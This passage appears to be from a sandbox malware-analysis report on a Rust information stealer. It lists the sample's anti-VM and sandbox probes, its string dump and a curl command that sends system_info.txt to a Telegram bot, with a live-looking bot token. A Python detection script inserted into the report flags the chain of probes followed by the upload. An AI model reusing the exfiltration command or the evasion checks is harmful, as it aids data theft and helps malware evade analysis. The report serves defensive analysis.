                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:20
                                      Start time:16:52:11
                                      Start date:19/12/2024
                                      Path:C:\Windows\System32\tasklist.exe
                                      Wow64 process (32bit):false
                                      Commandline:"tasklist" /m dbghelp.dll
                                      Imagebase:0x7ff793b00000
                                      File size:106'496 bytes
                                      MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:21
                                      Start time:16:52:11
                                      Start date:19/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:22
                                      Start time:16:52:11
                                      Start date:19/12/2024
                                      Path:C:\Windows\System32\tasklist.exe
                                      Wow64 process (32bit):false
                                      Commandline:"tasklist" /m api_log.dll
                                      Imagebase:0x7ff793b00000
                                      File size:106'496 bytes
                                      MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:23
                                      Start time:16:52:11
                                      Start date:19/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:24
                                      Start time:16:52:12
                                      Start date:19/12/2024
                                      Path:C:\Windows\System32\tasklist.exe
                                      Wow64 process (32bit):false
                                      Commandline:"tasklist" /m dir_watch.dll
                                      Imagebase:0x7ff793b00000
                                      File size:106'496 bytes
                                      MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:25
                                      Start time:16:52:12
                                      Start date:19/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:26
                                      Start time:16:52:12
                                      Start date:19/12/2024
                                      Path:C:\Windows\System32\tasklist.exe
                                      Wow64 process (32bit):false
                                      Commandline:"tasklist" /m pstorec.dll
                                      Imagebase:0x7ff793b00000
                                      File size:106'496 bytes
                                      MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:27
                                      Start time:16:52:12
                                      Start date:19/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:28
                                      Start time:16:52:13
                                      Start date:19/12/2024
                                      Path:C:\Windows\System32\tasklist.exe
                                      Wow64 process (32bit):false
                                      Commandline:"tasklist" /m vmcheck.dll
                                      Imagebase:0x7ff793b00000
                                      File size:106'496 bytes
                                      MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:29
                                      Start time:16:52:13
                                      Start date:19/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:30
                                      Start time:16:52:13
                                      Start date:19/12/2024
                                      Path:C:\Windows\System32\tasklist.exe
                                      Wow64 process (32bit):false
                                      Commandline:"tasklist" /m wpespy.dll
                                      Imagebase:0x7ff793b00000
                                      File size:106'496 bytes
                                      MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:31
                                      Start time:16:52:13
                                      Start date:19/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:32
                                      Start time:16:52:14
                                      Start date:19/12/2024
                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                      Wow64 process (32bit):false
                                      Commandline:"wmic" computersystem get model
                                      Imagebase:0x7ff6f2f80000
                                      File size:576'000 bytes
                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:33
                                      Start time:16:52:14
                                      Start date:19/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:34
                                      Start time:16:52:15
                                      Start date:19/12/2024
                                      Path:C:\Windows\System32\tasklist.exe
                                      Wow64 process (32bit):false
                                      Commandline:"tasklist" /fi "IMAGENAME eq vmtoolsd.exe"
                                      Imagebase:0x7ff793b00000
                                      File size:106'496 bytes
                                      MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:35
                                      Start time:16:52:15
                                      Start date:19/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:36
                                      Start time:16:52:15
                                      Start date:19/12/2024
                                      Path:C:\Windows\System32\tasklist.exe
                                      Wow64 process (32bit):false
                                      Commandline:"tasklist" /fi "IMAGENAME eq vboxservice.exe"
                                      Imagebase:0x7ff793b00000
                                      File size:106'496 bytes
                                      MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:37
                                      Start time:16:52:15
                                      Start date:19/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:38
                                      Start time:16:52:15
                                      Start date:19/12/2024
                                      Path:C:\Windows\System32\tasklist.exe
                                      Wow64 process (32bit):false
                                      Commandline:"tasklist" /fi "IMAGENAME eq vboxtray.exe"
                                      Imagebase:0x7ff793b00000
                                      File size:106'496 bytes
                                      MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:39
                                      Start time:16:52:15
                                      Start date:19/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:40
                                      Start time:16:52:15
                                      Start date:19/12/2024
                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                      Wow64 process (32bit):false
                                      Commandline:"wmic" csproduct get identifyingnumber
                                      Imagebase:0x7ff6f2f80000
                                      File size:576'000 bytes
                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:41
                                      Start time:16:52:15
                                      Start date:19/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:45
                                      Start time:16:53:16
                                      Start date:19/12/2024
                                      Path:C:\Windows\System32\curl.exe
                                      Wow64 process (32bit):false
                                      Commandline:"curl" -k -F chat_id=-4193710271 -F document=@system_info.txt;filename=284330-4180-1.log https://api.telegram.org/bot7068399075:AAEU8zRzCqB0URyCZuIuzOS0iXNMCPf1hu4/sendDocument
                                      Imagebase:0x7ff7f2c50000
                                      File size:530'944 bytes
                                      MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:46
                                      Start time:16:53:16
                                      Start date:19/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true
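
The process chain above (tasklist /m against hooking DLLs, tasklist /fi against guest-tools processes, wmic hardware queries, then curl posting system_info.txt to api.telegram.org) is what a detection engineer would want to match on. The following is an added example, not code from the Joe Sandbox report or from the analysed sample: Python detection logic that classifies process-creation records of this shape, pulls the exfiltration IOCs out of the curl command line, and raises one chain finding when a parent process runs several evasion probes before a Telegram upload. The DLL, process and WMI lists come from the report's process list and its string block; the record format, pids, parent pid, bot token and chat_id are constructed stand-ins.

```python
"""Detection logic for the evasion-then-exfiltration chain in this report.
Added example, not code from the Joe Sandbox report or the analysed sample.
Records mimic Sysmon Event ID 1 (pid, ppid, time, cmdline); command lines mirror
the report, while pids, ppid, bot token and chat_id are constructed."""
import re
from collections import defaultdict
from dataclasses import dataclass

# Probe targets taken from the report's process list and string block.
SANDBOX_DLLS = {"sbiedll.dll", "dbghelp.dll", "api_log.dll", "dir_watch.dll",
                "pstorec.dll", "vmcheck.dll", "wpespy.dll"}
VM_PROCESSES = {"vmtoolsd.exe", "vboxservice.exe", "vboxtray.exe"}
WMI_HW_PROBES = {("computersystem", "model"), ("csproduct", "identifyingnumber")}
TELEGRAM_RE = re.compile(
    r"https?://api\.telegram\.org/bot(?P<token>\d+:[\w-]+)/(?P<method>\w+)", re.I)
IMAGENAME_RE = re.compile(r"imagename\s+eq\s+(\S+)", re.I)


@dataclass(frozen=True)
class Finding:
    rule: str
    pid: int
    detail: str


def split_cmdline(cmdline):
    """Split a Windows command line on whitespace, keeping quoted spans whole."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def classify(rec):
    """Return a Finding for one process-creation record, or None if benign."""
    argv = split_cmdline(rec["cmdline"])
    if not argv:
        return None
    exe = argv[0].rsplit("\\", 1)[-1].lower().removesuffix(".exe")
    args, low = argv[1:], [a.lower() for a in argv[1:]]
    if exe == "tasklist":
        if "/m" in low and low.index("/m") + 1 < len(low):
            dll = low[low.index("/m") + 1]
            if dll in SANDBOX_DLLS:
                return Finding("sandbox_dll_probe", rec["pid"], dll)
        for a in args:  # tasklist /fi "IMAGENAME eq <guest tools process>"
            m = IMAGENAME_RE.search(a)
            if m and m.group(1).lower() in VM_PROCESSES:
                return Finding("vm_process_probe", rec["pid"], m.group(1).lower())
    elif exe == "wmic" and len(low) >= 3 and low[1] == "get":
        if (low[0], low[2]) in WMI_HW_PROBES:
            return Finding("wmi_hw_probe", rec["pid"], f"wmic {low[0]} get {low[2]}")
    elif exe == "curl" and ("-F" in args or "--form" in args):
        for a in args:
            m = TELEGRAM_RE.search(a)
            if m:
                chat = next((x[8:] for x in args if x.startswith("chat_id=")), "?")
                doc = next((x[9:].split(";")[0].lstrip("@")
                            for x in args if x.startswith("document=")), "?")
                # Alert on the numeric bot id only; the secret half of the token
                # belongs in the case file, not in every SIEM row.
                bot_id = m.group("token").split(":", 1)[0]
                return Finding("telegram_exfil", rec["pid"],
                               f"{m.group('method')} chat_id={chat} file={doc} bot_id={bot_id}")
    return None


def analyze(records, min_probes=3):
    """Classify every record in time order, then add one chain finding per parent
    that ran at least min_probes evasion probes before its Telegram upload."""
    per_parent, findings = defaultdict(list), []
    for rec in sorted(records, key=lambda r: (r["time"], r["pid"])):
        f = classify(rec)
        if f is not None:
            findings.append(f)
            per_parent[rec["ppid"]].append(f)
    for ppid, fs in per_parent.items():
        probes = 0
        for f in fs:
            if f.rule.endswith("_probe"):
                probes += 1
            elif f.rule == "telegram_exfil" and probes >= min_probes:
                findings.append(Finding("evasion_then_exfil", ppid,
                                        f"{probes} probes before {f.detail}"))
                break
    return findings


# Constructed input: command lines and times from the report, pids and the parent
# pid 1000 made up, token and chat_id replaced by stand-ins.
SAMPLE_RECORDS = [{"pid": p, "ppid": 1000, "time": t, "cmdline": c} for p, t, c in [
    (4122, "16:52:11", '"tasklist" /m api_log.dll'),
    (4124, "16:52:12", '"tasklist" /m dir_watch.dll'),
    (4126, "16:52:12", '"tasklist" /m pstorec.dll'),
    (4128, "16:52:13", '"tasklist" /m vmcheck.dll'),
    (4130, "16:52:13", '"tasklist" /m wpespy.dll'),
    (4131, "16:52:13", r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
    (4132, "16:52:14", '"wmic" computersystem get model'),
    (4134, "16:52:15", '"tasklist" /fi "IMAGENAME eq vmtoolsd.exe"'),
    (4136, "16:52:15", '"tasklist" /fi "IMAGENAME eq vboxservice.exe"'),
    (4138, "16:52:15", '"tasklist" /fi "IMAGENAME eq vboxtray.exe"'),
    (4140, "16:52:15", '"wmic" csproduct get identifyingnumber'),
    (4145, "16:53:16", '"curl" -k -F chat_id=-1001234567890 '
     '-F document=@system_info.txt;filename=284330-4180-1.log '
     'https://api.telegram.org/bot1234567890:AAExampleTokenRedacted/sendDocument'),
]]
```

The per-record rules are deliberately narrow (exact DLL and process names, exact WMI class/property pairs) because tasklist and wmic are common on administrator hosts; the chain rule in analyze() is what turns ten individually weak signals into one alert, and the same logic fits Sysmon Event ID 1 or EDR process telemetry once the record shape is mapped.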

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID: EnvironmentStrings$CloseFreeHandle
                                        • String ID: #$*+-./:?@\_cmd.exe /e:ON /v:OFF /d /c "batch file arguments are invalid$.exeprogram not found$PATHlibrary\std\src\sys_common\process.rs$\?\\$]?\\$assertion failed: is_code_point_boundary(self, new_len)$assertion failed: self.height > 0$exe\\.\NUL\cmd.exemaximum number of ProcThreadAttributes exceeded
                                        • API String ID: 1070102993-4160752474
                                        • Opcode ID: 5960bd245e651a0bc203704549e0705ff5c241d70c3ce5bb9b48f6b46ba59082
                                        • Instruction ID: 819d47778662e57c1f739317d54549f3c861eb97860f7d780abf1838af8d1e3f
                                        • Opcode Fuzzy Hash: 5960bd245e651a0bc203704549e0705ff5c241d70c3ce5bb9b48f6b46ba59082
                                        • Instruction Fuzzy Hash: 9A739362E18AD1CAEB709F26EC803FD67A0FB44789F805135CA6D8BBD5DF3992518350
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: /ficsproductidentifyingnumber$12345678$1RLV$COMPUTERNAMEComputer Name: $F0CF008J$L1HF0CF0$USERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel$a Display implementation returned an error unexpectedly/rustc/eeb90cda1969383f56a2637cbd3037bdf598841c\library\alloc\src\string.rs$ed.$getmacMAC Address: $nown$ormation$sbiedll.dlldbghelp.dllapi_log.dlldir_watch.dllpstorec.dllvmcheck.dllwpespy.dll/mtasklistsandboxusertestadminrootmalwareanalysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul userworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARA$system_info.txtFailed to write to file: $systeminfoSystem Info: $tected.$wmicC:\windows\sysnative\drivers\vmmouse.sysC:\windows\sysnative\drivers\vmhgfs.sysC:\windows\sysnative\drivers\vmusbmouse.sysvmtoolsd.exevboxservice.exevboxtray.exeIMAGENAME eq $x DLLs:
                                        • API String ID: 0-225615594
                                        • Opcode ID: 249bcf8dd2f332ae1225c476441c98646916a24004a58fc37924a2357b234292
                                        • Instruction ID: 847771175c8fb479b15be40e0bd693079503a6e4294149eb71d034570702d76c
                                        • Opcode Fuzzy Hash: 249bcf8dd2f332ae1225c476441c98646916a24004a58fc37924a2357b234292
                                        • Instruction Fuzzy Hash: BB736D72A05BC18AE7719F26EC843E973A4FB44788F904135CA5C5BB99EF399394C390

                                        Control-flow Graph

                                        Control-flow graph (rendered here as a text summary; the graph itself is not reproduced): function at 7ff7f411fdf0, entry block 7ff7f411fdf0-7ff7f411fe53. Win32 calls on the graph: GetCurrentProcessId, ProcessPrng, CreateNamedPipeW, GetLastError, CloseHandle; internal calls: 7ff7f4132200, 7ff7f410a130, 7ff7f410a120, 7ff7f413f3f0, 7ff7f411e610, 7ff7f4113e00. The GetCurrentProcessId / ProcessPrng / CreateNamedPipeW / GetLastError sequence is consistent with the anonymous-pipe setup Rust's standard library performs when a child's output is captured, which fits the tasklist and wmic children listed above rather than a separate command channel.
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID: Process$CurrentPrng
                                        • String ID:
                                        • API String ID: 716580790-0
                                        • Opcode ID: 09d2c0eac5f259194c220c55946c3fb403d336c09e5686cb49c32fa7fa278b81
                                        • Instruction ID: e7dfddcb5630be65805a9b511e479645e5628083f523d5dd3df26f52f705202a
                                        • Opcode Fuzzy Hash: 09d2c0eac5f259194c220c55946c3fb403d336c09e5686cb49c32fa7fa278b81
                                        • Instruction Fuzzy Hash: 5D22D562E08A818AE7649F26E8803FA7BA0FB44798F504235DE6D877D5DF7DD244C390

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID: CloseFind$FileFirstHandle
                                        • String ID:
                                        • API String ID: 1310327803-0
                                        • Opcode ID: 108ad1669d5f654cf7088fbd5db76f8917ec5f9a1101b15b5fb6b39ab74f4e40
                                        • Instruction ID: bb32bc6c0798f1b1448335687645f208a07400568f21a9fc4eecc76bde7f20ed
                                        • Opcode Fuzzy Hash: 108ad1669d5f654cf7088fbd5db76f8917ec5f9a1101b15b5fb6b39ab74f4e40
                                        • Instruction Fuzzy Hash: 80518232E04B8187E7709F62F8847AAA675FB457A8F404235CE6D4BBD5DF3CA5418390

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID: ErrorFileObjectSingleStatusWaitWrite
                                        • String ID:
                                        • API String ID: 3447438843-0
                                        • Opcode ID: 83d7b160387bc71befc0e2236d4a3df64de8f29feef33d0b9e5494b388aa95c9
                                        • Instruction ID: 286f84e87720cba830db5a296cf0433f61b276aac42db5e56723b9badc641622
                                        • Opcode Fuzzy Hash: 83d7b160387bc71befc0e2236d4a3df64de8f29feef33d0b9e5494b388aa95c9
                                        • Instruction Fuzzy Hash: 8A318E32F08B518AE710DFB5F8907A977A4EB95358F944130EA5D43AD8EF38D1958390

                                        Control-flow Graph

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID: ErrorFileObjectReadSingleStatusWait
                                        • String ID:
                                        • API String ID: 3583596364-0
                                        • Opcode ID: 6b2b8c81433aba9b8012bb8a5dc3d03e10c04479521bde7f886105c347d82123
                                        • Instruction ID: 430f021e8a43cf0997036aa12a28efb1623d7e26d261e5509b79cf0453d3fd90
                                        • Opcode Fuzzy Hash: 6b2b8c81433aba9b8012bb8a5dc3d03e10c04479521bde7f886105c347d82123
                                        • Instruction Fuzzy Hash: 58319232F08B418AF710DF75F8807A967B4AB95368F944130EA5D83AD8EF3CD1958390

                                        Control-flow Graph

                                        • Graph image not extracted (executed/not-executed colouring lost). Function entry 7ff7f410cbf0; block 7ff7f410cc28 calls BCryptGenRandom; block 7ff7f410cc4c calls SystemFunction036 and is reached from the BCryptGenRandom block; both paths rejoin at 7ff7f410cc64.
                                        APIs
                                        • BCryptGenRandom.BCRYPT(?,?,?,00007FF7F410C955,?,?,?,00007FF7F413D87B), ref: 00007FF7F410CC42
                                        • SystemFunction036.ADVAPI32(?,?,?,00007FF7F410C955,?,?,?,00007FF7F413D87B), ref: 00007FF7F410CC53
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID: CryptFunction036RandomSystem
                                        • String ID:
                                        • API String ID: 1232939966-0
                                        • Opcode ID: 156b8d29b021a0b699b54c0dc488f79796eb3c5d946079082ee26368548ee791
                                        • Instruction ID: 8da536a62a7c132db008b4a0cd5472aa970daf8a484f79c4104bc9186de44476
                                        • Opcode Fuzzy Hash: 156b8d29b021a0b699b54c0dc488f79796eb3c5d946079082ee26368548ee791
                                        • Instruction Fuzzy Hash: 1CF0F422F0915542FB687E6BFF88530D5412F19BF0F784731AC3C877E0BD28A8824650

                                        Control-flow Graph

                                        • Graph image not extracted (executed/not-executed colouring lost). Function entry 7ff7f410da70 calls GetTimeZoneInformationForYear; blocks 7ff7f410db0b and 7ff7f410db24 each call 7ff7f410dba0; every failing check exits through 7ff7f410db4f to 7ff7f410db55.
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID: InformationTimeYearZone
                                        • String ID:
                                        • API String ID: 2325421820-0
                                        • Opcode ID: 00a454c135f09f1f250e6a997138a96e1f69e719d8c17f8820de649a108718ef
                                        • Instruction ID: 5f76f75c55c104c827e04eba1628951b92472a6ea7af74740b8c542ef565fe85
                                        • Opcode Fuzzy Hash: 00a454c135f09f1f250e6a997138a96e1f69e719d8c17f8820de649a108718ef
